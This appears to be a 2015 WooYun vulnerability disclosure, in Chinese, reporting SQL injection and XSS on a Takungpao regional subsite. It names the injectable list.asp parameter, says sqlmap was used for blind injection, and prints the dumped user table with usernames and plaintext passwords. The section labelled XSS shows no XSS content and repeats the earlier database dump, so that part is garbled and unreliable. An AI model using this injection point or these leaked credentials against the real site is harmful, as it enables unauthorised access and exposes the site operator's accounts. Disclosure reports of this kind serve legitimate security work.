缺陷编号:WooYun-2015-0128510
漏洞标题:大公网某分站多处漏洞打包(xss/sql)
相关厂商:大公网
漏洞作者:尊-折戟
提交时间:2015-07-22 23:39
公开时间:2015-09-05 23:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
2015-07-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开
关注时事新闻!
首先来第一发:
1 |
http://cq.takungpao.com/list.asp?classid=155 |
基于时间SQL盲注:
sqlmap跑下
1 2 3 4 5 |
Database: Microsoft_Access_masterdb<br> [1 table]<br> +----------+<br> | tbl_user |<br> +----------+ |
最近网速不好,我就列了下重要的数据。
这网速我也是醉了,实在受不鸟。好吧,我就列了最后的。唔
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
Database: Microsoft_Access_masterdb<br> Table: tbl_user<br> [2 entries]<br> +--------+------------------------------------------------------------------------------------------<br> ----------------------------------------------------------------------------------------------------<br> -------------------------------------------------------------------+----------+---------+<br> | userid | access| username | userpwd |<br> +--------+------------------------------------------------------------------------------------------<br> ----------------------------------------------------------------------------------------------------<br> -------------------------------------------------------------------+----------+---------+<br> | 1 | 134, 135, 75, 270, 88, 22, 153, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 154,<br> 156, 158, 160, 162, 122, 78, 264, 121, 71, 76, 258, 293, 294, 295, 296, 297, 269, 54, 51, 260, 261,<br> 262, 263, 89, 146, 171, 172, 173, 271, 236, 237, 238, 239, 240, 2 | cq | 123654 |<br> | 2 | 75, 88, 22, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 122, 78, 264, 121, 71, 7<br> 6, 258, 269, 54, 51, 260, 261, 262, 263, 256, 257, 146, 32, 25, 139<br> | hy | hy |<br> +--------+------------------------------------------------------------------------------------------<br> -------------------------------------------------------------------------------- |
就跑了这一点点。第二发:XSS漏洞(反射型)
1 2 3 4 5 |
Database: Microsoft_Access_masterdb<br> [1 table]<br> +----------+<br> | tbl_user |<br> +----------+ |
最近网速不好,我就列了下重要的数据。
严格控制关键字。安全狗拦截
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
<code>http://cq.takungpao.com/list.asp?classid=121</code> access库可注入出用户数据 哥哥表示不服啊 跟你重复了
原文连接
的情况下转载,若非则不得使用我方内容。